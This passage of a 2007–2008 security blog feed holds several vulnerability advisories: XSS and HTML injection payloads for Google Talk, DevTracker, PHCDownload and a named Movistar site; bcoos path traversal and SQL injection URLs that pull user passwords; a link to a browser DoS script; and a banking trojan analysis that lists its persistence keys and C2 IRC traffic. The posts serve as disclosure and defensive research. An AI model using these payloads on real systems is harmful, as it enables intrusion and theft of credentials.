traditional text or voice and is <br />also integrated with Gmail. According to information released <br />last year, Google Talk is used by more than 3 million users <br />worldwide. <br /><br /><br /><br />GTalk contains a flaw that allows a remote<br />cross site scripting or HTML injection attack.This flaw <br />exists because the application does not validate 'http'<br />and 'mailto' upon submission to conversation window.<br />This could allow a user to create a specially crafted URL<br /> or mailto address that would execute arbitrary code<br />in a user's gtalk within the trust relationship<br />between the gtalk and the server,leading loss of integrity<br /><br />A remote user can Stealing messages on the target Gtalk user.<br /><br /><br />################<br />Versions afected<br />################<br /><br />This Issue aparently no affects Gtalk labs edition<br />( testing without results)<br /><br />This issue aparenly no affects Gtalk Web user<br /> ( testing without results in web client from Mail.google.com)<br /><br />This issue aparently no afects Gtalk Gadget users <br />(testing without results in web client from http://talkgadget.google.com/talkgadget/popout?hl=es)<br /><br /><br />##################<br />TIme line<br />##################<br /><br />discovered: 05-06-2008 <br />Vendor notify: 07-06-2008<br />Vendor reponse: 07-06-2008<br />Vendor fix:<br />Public Disclosure: 25-06-2007<br /><br />########################<br />Solution <br />########################<br /><br />No solution at this time , however all users with a<br />vulnerable Gtalk client, can talk without problems <br />with Google talk labs edition, or by Web client in<br />Gmail account , or they can use the Google Gtalk Gadget.<br /><br />################################<br />How to reproduce or how to test:<br />################################<br /><br />#################<br />HTML Injection<br />#################<br /><br />For this test we need two accounts of Gmail (attacker<br />and Victim), and Gtalk version 1.0.0.105<br />In this text We only send a h1 html tag with a text and<br />it is executed in the victims Gtalk.<br /><br />let´s Go !!!<br /><br />1- Open one account in explorer ( go to mail.google.com<br /> and make login with the attacker mail)<br /><br />2- Open the second account in Gtalk ( open Gtalk and make<br /> loging with victim´s mail)<br /><br />3- In the attacker accound open a chat with the victims<br /><br />4- Write this msg To victim http://"><h1>Lostmon</h1><br /><br />Wen gtalk try to convert the text link in a clicable URL,the html<br />tag 'h1' is executed in the victim´s machine; and now all what<br />the attacker write , have the attribute 'h1' in the victim´s Machine.<br /><br />For solve this situation , the gtalk user need to write something <br />to attacker.<br /><br />If Gtalk user try to send the same malformed link to a webuser,<br />it is executed in his machine and it does not work in the webuser<br />machine and he only have a clicable link and part of the url with <br />the html, is not clicable . them the Gtalk users via web are not<br />vulnerable.<br /><br />if the Gtalk user (victim) try to send it to the webuser (attacker)<br />the html is executend in the Gtalk client and now all what victims<br />write has the attibute 'h1' ..... for solve the attacker need to send any<br />text to victim, and now the conversation window are free of 'h1' html tag.<br /><br />I make several probes with other tags ,like script or img , but at<br />this moment i can´t bypass the filter or i can´t look ...moore Deep :P<br /><br />This issue comes in Gtalk wen try to conver text in a clicable url ,<br />this flaw affects to mailto function too !!!<br /><br />We can do the same test but wen try to send the msg send this<br />mailto:"><h1>Lostmon</h1>.<br /><br />Continue Testing with Gtalk labs edition as the attacker and<br />gtalk 1.0.0.105 as the victim and the attacker can send to <br />victims with the same result.<br /><br />We can try to insert other html tag like script , and aparently if we<br />look the sorce code of the Gtalk window it is executed, but does no<br />appear nothing ....send to victim :<br />http://"><h1>Lostmon</h1> and<br />look for the source code of the Gtalk window.<br /><br /><br />If the attackers send to victims:<br />http://&#34&#62&#60&#104&#49&#62&#76&#111&#115&#116&#109&#111&#110&#60&#47&#104&#49&#62<br /><br />Gtalk only convert this url in his html value<br />http://"><h1>Lostmon</h1><br />but don´t execute ...<br /><br />Gtalk accept html encoding them !!!<br /><br />#######################################<br />source in victims conversation window<br />########################################<br /><br /><DIV class="msg 1st"><SPAN style="FONT-WEIGHT: bold">Lostmon</SPAN>:<br /><br /> <A href='http://"></a href=""><h1>Lostmon</h1'>http://"&gt;</A><br /><br /> <H1>Lostmon</H1</a>&gt;</DIV><br /><br />###########################<br />Proof Of Messages Stealing<br />###########################<br /><br />Try the attacker send with Gtalk labs edition and victim with gtalk 1.0.0.105<br /><br />If victim has enable notifications for example wen others users talking to he <br />and he have minimice Gtalk,a attacker can send to he :<br /><br />http://"><script>alert()</script><br /><br />or<br /><br />mailto:"><script>alert()</script><br /><br />And continue talk with the victim , has only in his window http://"><br />but it the attacker continue talking with he<br />the victim only can view what say the attacker by notifications<br />for a few seconds because wen look his window he only has http://"><br /><br />This can be used to talk Stealing of to other type of spoffing attacks.<br />This situation is end wen the victim talk to attacker.<br /><br /><br />If the victim´s send to attacker http://"><script>alert()</script> ,<br />them the victim can´t look any text what he send.<br />the victims need that,the attackers send a msg to victim for solve this<br />situation , and now the victim can look again his mesages.<br /><br /><br />#################<br />Conclusion<br />#################<br /><br /><br />With the result of all of this test, we can think that only the html<br />filter for Gtalk 1.0.0.105 does not work properly and this can be a potential<br />Vulnerability because a attacker can execute html code in the victim´s machine<br />and the attacker can stealing menssages in victim´s machine ....<br /><br /><br />########################€nd##################<br /><br /><br />Thnx to estrella to be my light.<br />Thnx To FalconDeOro For his support.<br />Thnx to Imydes From www.imydes.com For testing with me.<br />Thnx To all Lostmon Group Team For his continue support<br />Thnx to all Google security Team for his patience and fast Response<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-67690441387633036622008-05-18T08:31:00.003-07:002008-07-12T06:42:06.644-07:00Bcoos highlight.php traversal file access####################################<br />Bcoos =< 1.0.13 highlight.php traversal file access<br />Vendor URL: http://www.bcoos.net<br />Advisore:http://lostmon.blogspot.com/2008/05/<br />bcoos-highlightphp-traversal-file.html<br />Vendor notify:yes Exploit available:yes<br />####################################<br /><br /><br />bcoos is content-community management system written in PHP-MySQL<br /><br />Directory traversal vulnerability in bcoos 1.0.13 and earlier <br />allows remote attackers to read arbitrary files via a ../<br />(dot dot) in the CD command or if the attacker know the full path.<br /><br />Only Can read Files with extension, if the file don´t have extension<br />bcoos redirect to index.<br /><br />##############<br />Versions<br />##############<br /><br />bcoos 1.0.13<br />bcoos 1.0.12<br />bcoos 1.0.11<br />bcoos 1.0.10<br />bcoos 1.0.9<br /><br />##############<br />Solution<br />##############<br /><br />No solutions was available at this time !!!<br /><br />Vendor Bugtrack : http://www.bcoos.net/modules/<br />devtracker/view_issue.php?issue_id=2467<br /><br />##############<br />TimeLine<br />##############<br /><br />Discovered:02-03-2008<br />vendor notify:18-05-2008<br />vendor response:<br />vendor fix:<br />Disclosure:18-05-2008<br /><br />################<br />Proof of Concept<br />################<br /><br />http://localhost/bcoos/class/debug/<br />highlight.php?file=C:\boot.ini<br /><br />http://localhost/bcoos/class/debug/<br />highlight.php?file=../../../../../boot.ini<br /><br />For exploit this issue the attacker need webmaster privileges.<br />But if a system has multiple webmasters.. all can read files <br />outside webserver root directory.<br /><br />The file what we want to access need a extension if the file no<br />have extensionvwe can´t read it, and bcoos redirects to index.<br /><br />################€nd##################<br /><br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14018913190199586882008-05-17T14:12:00.002-07:002008-07-12T06:42:06.644-07:00Canal cliente de Movistar Vulnerable a XSS######################################<br />Canal cliente de Movistar Vulnerable a ataques Cross-Site Scripting<br />######################################<br /><br />La pagina De movistar https://www.canalcliente.movistar.es<br />se haya afectada por una vulnerabilidad llamada Cross-site <br />scripting (XSS) atraves de la cual un atacante puede inducir<br />a un usuario victima a visitar dicha pagina, atraves de una URL<br />modificada especialmente y ejecutar codigo html o javascript en<br />el navegador del usuario victima , en el contexto de seguridad<br />en el margen de confianza entre el navegador y el servidor<br />pudiendo obtener la informacion acabada de enviar por el <br />usuario o establecer acciones por el.<br /><br />Existe una prueba de concepto y una imagen de muestra.<br />Movistar fue avisado atraves de un correo y de su sistema de contacto <br />en la misma web pero no se ha obtenido respuesta.<br /><br />#################<br />Exploit<br />#################<br /><blockquote>https://www.canalcliente.movistar.es/fwk/cda/controller/CCLI_CW_publico/0,2214,259_1854_200108516_0_0,00.html?codError=SGAP036&mensaje=%3C%68%31%3E%53%65%20%62%75%73%63%61%20%48%34%78%30%72%3C%73%74%72%6F%6E%67%3E%2C%20%63%6F%6D%6F%20%4C%6F%73%74%6D%6F%6E%20%70%6F%72%20%65%6A%65%6D%70%6C%6F%3A%3C%70%3E%0D%0A%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%3C%2F%61%3E%3C%2F%70%3E%3C%2F%68%31%3E%0D%0A%20%45%73%20%70%65%6C%69%67%72%6F%73%6F%20%79%20%76%61%20%61%72%6D%61%64%6F%3C%62%72%3E%20%4C%6C%65%76%61%20%75%6E%20%70%6F%72%74%61%74%69%6C%20%79%20%75%6E%20%70%61%6C%6D%20%65%6E%20%6C%61%73%20%6D%61%6E%6F%73%3C%62%72%3E%20%73%69%20%6C%65%20%76%65%6E%20%3B%20%6E%6F%20%6C%65%20%70%72%6F%70%6F%72%63%69%6F%6E%65%6E%20%63%6F%6E%65%78%69%6F%6E%20%61%20%69%6E%74%65%72%6E%65%74%2E%3C%2F%70%3E%3C%2F%73%74%72%6F%6E%67%3E%3C%70%3E%3C%2F%70%3E%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%74%76%6E%2E%63%6F%6D%2E%76%6E%2F%55%70%6C%6F%61%64%65%64%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%68%61%63%6B%65%72%2E%6A%70%67%3E%3C%68%31%3E%42%79%20%4C%6F%73%74%6D%6F%6E%3C%2F%68%31%3E</blockquote><br /><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/movistar.GIF" height="250" width="400"></center><br />--<br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50502468160286579362008-04-06T04:41:00.008-07:002008-04-06T10:41:05.649-07:00Multiple Browsers DoS by evil javascript code<center><p>Multiple Browsers DoS by <a href="http://lostmon.blogspot.com/" target="_blank">Lostmon</a></p></center><br />Tested in windows with IE7,IE8,Mozilla Firefox,Avant browser,<br />Flock Browser,Safari browser, Opera Browser aparently is <br />not vulnerable.<br /><br />In all cases the browser become slow & unresponsive and<br />aplication is hang, resulting in a recoverable DoS issue. <br />The code play with the document.href ,window.open.<br /><br />I decide to ofuscate the code to dificult others to look.<br /><br /><strong>Internet Explorer:</strong><br />Aplicación que no responde: iexplore.exe, versión 8.0.6001.17184,<br />módulo que no responde hungapp, versión 0.0.0.0, dirección<br />que no responde 0x00000000.<br /><br />In ie 8 i have surprised, because if we open the exploit localy<br />from the desktop for example ... and we allow the activex warnnig<br />and allow popups , iexplorer opens a window with the contentcof c:\<br /><br />I have surprised because the url(location.href) relative in the<br />exploit wen we open from desktop is C:\documents and<br />settings\YOUR_USER\desktop\browser_die.html<br /><br />so why explorer opens a window with c:\ .. this is a incorrect<br />location.href location....<br /><br /><strong>Flock Browser:</strong><br /><br />Aplicación que no responde: flock.exe, versión 1.1.1.0,<br />módulo que no responde hungapp, versión 0.0.0.0, dirección<br />que no responde 0x00000000.<br /><br /><strong>Mozilla Firefox:</strong><br />Aplicación que no responde: firefox.exe, versión 1.8.20080.31114,<br />módulo que no responde hungapp, versión 0.0.0.0, dirección que<br />no responde 0x00000000.<br /><br /><br /><strong>Avant Browser:</strong><br />Aplicación que no responde: avant.exe, versión 11.5.0.0,<br />módulo que no responde hungapp, versión 0.0.0.0,<br />dirección que no responde 0x00000000.<br /><br />In avant browser if we have on the popups blocker the browser<br />become unresposive in a few seconds , if wen don´t have on,<br />the browser detect that this is a slow script, but become hang too.<br /><br /><strong>Safari For windows:</strong><br /><br />In safari for windows ,if we have open a window with google <br />for example,and open the exploit in a new safari window with<br />the exploit an click in the button,safari opens a few popups,<br />and aftter close all popups and close of other windows.<br />too the first window what open with google :O<br /><br /><strong>Demo of exploit:</strong><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/explorer/browser_die.html" target="_BLANK"><form><br /><input value="Press Me" type="button" onclick=javascript:window.open('http://usuarios.lycos.es/reyfuss/xss/images/explorer/browser_die.html')></form></a><br /><br />Thnx to imydes from www.imydes.com for his support.<br /><br />Atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/" target="_blank">http://Lostmon.blogspot.com</a><br />Google group: <a href="http://groups.google.com/group/lostmon" target="_blank">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente...</p><em></em><em></em><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-26197364911610875152008-03-12T11:36:00.002-07:002008-03-13T12:06:22.269-07:00Gusanito.exe descarga troyano bancario y conecta a irc########################################################<br />Gusanito.exe descarga troyano bancario y conecta a irc<br />Articulo original:http://lostmon.blogspot.com/2008/03/<br />gusanitoexe-descarga-troyano-bancario-y.html<br />########################################################<br /><br />Hoy me llego un nuevo intento de pishing disfrazado<br />con una targeta de gusanito.com.<br /><br />Despues de un leve estudio sobre el mismo descubro que<br />el link de la targeta lleva a la descarga directa de<br />un archivo llamado "gusanito.exe".<br /><br />##########################<br />imagen del mail<br />##########################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail.GIF" height="250" width="400"></a><br /><br />Me descargo el ejecutable y despues de analizar el <br />archivo , me sorprendo por lo poco escondido que <br />esta en si el intento de fraude.<br /><br />###########################<br />Imagen cabeceras mail<br />###########################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail_cabeceras.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/vista_mail_cabeceras.GIF" height="250" width="400"></a><br /><br />Si el usuario incauto descargo y ejecuto, ya que <br />se esconde bajo el incono de un dibujo, el archivo<br />esconde un troyano bancario llamado winmedia.exe<br />el troyano es Trojan-Spy.Win32.Banker.anv o alguna<br />de sus variantes su informacion puede consultarse aqui:<br /><br />http://www.viruslist.com/en/viruses/encyclopedia?virusid=105552<br /><br /><br />Si observamos el codigo en hexa del ejecutable "gusanito.exe"<br /> encontramos varias cosas curiosas:<br /><br /> La ruta donde el el atacante a compilado su proyecto asi<br /> como el nombre de usuario con el que se haya logeado en su<br /> maquina.<br /> <br />C : \ D o c u m e n t s a n d S e t t i n g s \ h u g o \<br /> E s c r i t o r i o \ H u g o T o o l s F I N A L I S I M O<br /> 3 . 0 \ H u g o T o o l s \ D R O N E S \ P r o y e c t o 1 . v b p <br /> <br /> Entre el codigo tambien se ve que interactua con MSN ,obteniendo<br /> la lista de contactos y mandando in mensage a los contactos con varios<br /> mensages distintos, imitando alguna de los tipicos virus de msn<br /> con los mensages , mira estas fotos o mira este video hermoso hermoso<br /> hermoso entre otras (en el archivo hexa pueden verse claramente)<br /> <br /> lanzando asi la url para el usuario victima junto con la frase.<br /> <br /> #########################################<br /> imagen clave msn y imagen frases msn<br /> #########################################<br /> <a href="http://usuarios.lycos.es/reyfuss/pshishing/hexa_msn.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/hexa_msn.GIF" height="250" width="400"></a><br /><br /><center><a href="http://usuarios.lycos.es/reyfuss/pshishing/hexa_frases.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/hexa_frases.GIF" height="250" width="400"></a></center><br /> <br /> #############################################<br />Imagen link descarga y clave registro windows<br />###############################################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/clave_descrga.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/clave_descrga.GIF" height="250" width="400"></a><br /><br />Ademas , se establece una conexion al servidor ccpower.com.mx <br />por irc con un nick Drone??? donde ??? son numeros aleatorios<br />y entrando al canal #banamex donde de los casi 400 usuarios <br />del canal ,el 90% son victimas infectadas.<br /><br />#############################<br />conexion irc<br />#############################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/hexa_irc.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/hexa_irc.GIF" height="250" width="400"></a><br /><br />Es desde este canal desde donde se manejan a los usuarios <br />victima ,pasando por el canal las direcciones de email <br />de los contanctos de las victimas y obteniendo los datos <br />que hayan podido ser capturados por el atacante , bien sea<br />por el troyano o bien sea por las funciones de keyloger <br />que posee el ejecutable.<br /><br />############################################<br />Imagen vista irc<br />############################################<br /><a href="http://usuarios.lycos.es/reyfuss/pshishing/vista_irc.GIF" target="_BLANK"><img src="http://usuarios.lycos.es/reyfuss/pshishing/vista_irc.GIF" height="250" width="400"></a><br /><br /><br />ni que decir tiene que fuy baneado de su irc ...<br />creo que no tienen sentido del humor XDDDD <br /><br />La proteccion es la misma de siempre, no descargar <br />archivos desde fuentes no fidelignas,<br /><br />Tener el antivirus actualizado<br /><br />Y NO EJECUTAR NADA SIN SABER QUE ES Y SIN HABERLE<br />PASADO ANTES UN ANTIVIRUS !!!!!!!<br /><br />################################<br />Analisis automatico del archivo<br />(gracias a Jose luis)<br />################################<br /><br />Un examen automático da esto:<br /><br />Intenta replicarse a través de una red.<br /><br />Se copia en la carpeta de Windows:<br /><br /> C:\Windows\WinMedia.exe<br /><br />Crea o modifica las siguientes entradas del registro:<br /><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IpInIp<br /><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IASSDO<br /> EnableFileTracing = 0x00000000<br /> EnableConsoleTracing = 0x00000000<br /> FileTracingMask = 0xFFFF0000<br /> ConsoleTracingMask = 0xFFFF0000<br /> MaxFileSize = 0x00100000<br /> FileDirectory = "%windir%\tracing"<br /><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br /> SystemMigration = "%Windir%\WinMedia.exe"<br /><br />Se intenta conectar a la siguiente dirección:<br /><br /> irc.ccpower.com.mx<br /><br />Se conecta y envía los siguientes datos:<br /><br /> USER nomail@nomail.com localhost9195 irc.ccpower.com.mx :botitooo<br /> NICK Drone-919-5<br /> JOIN :#banamex<br /> PONG :response<br /> PONG ::+i<br /> PONG :list.<br /> PONG ::.VERSION.<br /> PONG ::.status<br /> PONG ::.id<br /> PONG ::.stats<br /> PONG ::.uptime<br /> PONG :PROCESS_NAME_TO_TERMINATE<br /> PONG ::.ident<br /> PONG ::.keylog<br /> PONG ::.httpserver<br /> PONG :50<br /> PONG :-r<br /> PONG :60<br /> USER nomail@nomail.com localhost11606 irc.ccpower.com.mx :botitooo<br /> NICK Drone-1160-6<br /><br /><br />#################€nd#####################<br /><br />Thnx to Jose Luis from http://www.vsantivirus.com <br /> por el analisis automatico, su paciencia y ayuda :)<br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-89087042271360256382008-02-07T12:32:00.000-08:002008-02-07T12:58:59.519-08:00bcoos /mysections/ratefile.php lid variable SQL injection############################################<br />bcoos /mysections/ratefile.php lid variable SQL injection<br />vendor url: http://www.bcoops.net<br />Advisore: http://lostmon.blogspot.com/2008/02/<br />bcoos-mysectionsratefilephp-lid.html<br />vendor notify:NO exploits available: YES<br />############################################<br /><br />bcoos is content-community management system written in PHP-MySQL.<br /><br />bcoops contains a flaw that may allow an attacker to carry out<br />an SQL injection attack. The issue is due to the script not <br />properly sanitizing user-supplied input to the 'lid' variable,<br />and adresses/ratefile.php script.This may allow an attacker to<br />inject or manipulate SQL queries in the backend database.<br /><br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoops =< 1.0.11 vulnerable<br /><br />#################<br />Solution:<br />#################<br /><br />No solution at this time !!!<br />Also you can try to edit the source code and<br />put this code to mitigate 'union' injection:<br /><br />open modules/mysections/ratefile.php<br /><br />arround line 76 found this code:<br /><br />exit();<br />} else {<br /><br />you can change for:<br /><br />exit();<br />} <br />if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))<br /> {<br /> echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";<br /> redirect_header("index.php");<br /> die();<br />}<br /> else {<br /><br />And now this union sql attack is patched :D<br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered:31-01-2008<br />vendor notify:--------<br />vendor response:-------<br />disclosure:07-02-2008<br /><br /><br />#################<br />SQL intection:<br />#################<br /><br /><br />http://localhost/modules/mysections/ratefile.php?lid=<br />-99%20UNION%20SELECT%20pass%20FROM%20bcoops_users%20LIMIT%201<br /><br /><br /><br />#######################€nd##############################<br /><br /><br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-44168702099465320952008-02-04T11:46:00.000-08:002008-02-04T11:56:05.369-08:00bcoos & E-xoops DevTracker module two variables XSS############################################<br />bcoos& E-xoops DevTracker module two variables XSS<br />vendor url: http://www.bcoos.net<br />Vendor url: http://www.e-xoops.com<br />Advisore: http://lostmon.blogspot.com/2008/02/<br />bcoos-and-e-xoops-devtracker-module-two.html<br />vendor notify:yes exploits available: YES<br />############################################<br /><br /><br /><br />bcoos and E-xoops are two content-community management<br />system written in PHP-MySQL.<br /><br />bcoos and E-xoops contains a flaw that allows a remote<br />cross site scripting attack.This flaw exists because the<br />application does not validate 'order_by' & 'direction'<br />variables upon submission to 'index.php' script in <br />DevTracker module.This could allow a user to create a <br />specially crafted URL that would execute arbitrary code<br />in a user's browser within the trust relationship <br />between the browser and the server,leading loss ofintegrity<br /><br /><br /><br />#################<br />Versions:<br />#################<br /><br />bcoos =< 1.1.11 DevTracker (¿ 3.0 ?)<br />E-xoops =< 1.0.8 DevTracker v0.20<br /><br />And posible early versions with this module instaled.<br /><br />Here you have a src reference for<br />E-xoops 1.0.8 http://phpxref.com/xref/exoops/nav.html<br /><br /><br />#################<br />Solution:<br />#################<br /><br />No solution available at this time<br />Try to edit the source code.<br /><br /><br />#################<br />Timeline:<br />#################<br /><br />Discovered:01-02-2008<br />vendor notify:03-02-2008<br />vendor response:-------<br />disclosure:04-02-2007<br /><br />#############<br />Examples<br />#############<br /><br />http://[victim]/modules/devtracker/index.php?proj_id=1&order_by=<br />priority&direction=ASCquot;><script>alert()</script><br /><br />http://[Victim]/modules/devtracker/index.php?proj_id=1<br />&order_by=priorityquot;><script>alert()</script><br />&direction=ASC<br /><br /><br />#######################€nd###################<br /><br /><br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />Atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-738843414434749682007-12-28T11:11:00.000-08:002007-12-28T13:41:12.819-08:00XSS Flaw & posible SQL injection in search.php in PHCDownload###############################################<br />XSS Flaw & posible SQL injection in PHCDownload<br />vendor url: http://www.phpcredo.com/<br />Advisore: http://lostmon.blogspot.com/2007/12/<br />xss-flaw-posible-sql-injection-in.html<br />vendor notify:YES exploit available: YES<br />###############################################<br /><br />New XSS Flaw & posible SQL injection in search.php<br /> <br />PHCDownload contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application does<br />not validate 'string' variable upon submission to 'search.php'<br />script.<br /><br />This could allow a user to create a specially crafted URL that<br />would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />verions:<br /><br />1.1.0 afected.<br /><br />example :<br /><br />we can try inject some normal html or javascript code:<br /><br />Code:<br /><br />"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://lostmon.blogspot.com"></iframe></p><br /><br />or inject directly the code in hex values :<br /><br />Code:<br /><br />%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E<br />example in hex:<br /><br />http://localhost/phcdownload/search.php?string=[XSS-CODE]<br /><br />also this variable is prone vulnerable too to SQL injections.<br /><br />if we look the source code of search.php arround line 36 we have :<br /><br />Code:<br />// Prepare search query<br /> if( $kernel->config['archive_search_mode'] == 1 )<br /> {<br /> $search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";<br /> }<br /> else<br /> {<br /> $search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";<br /> }<br />the value of 'string' is inserted directly in the sql query and this could be dangerous...<br /><br />we can try to disclose the query :<br /><br />http://localhost/phcdownload/upload/search.php?string='<br /><br />i make several probes , but i don´t have found a working exploit or a<br />exploitable angle to this issue , but ...need to be patch<br /><br />Thnx to estrella to be my ligth<br />Thnx to all Lostmon´s Group Team<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
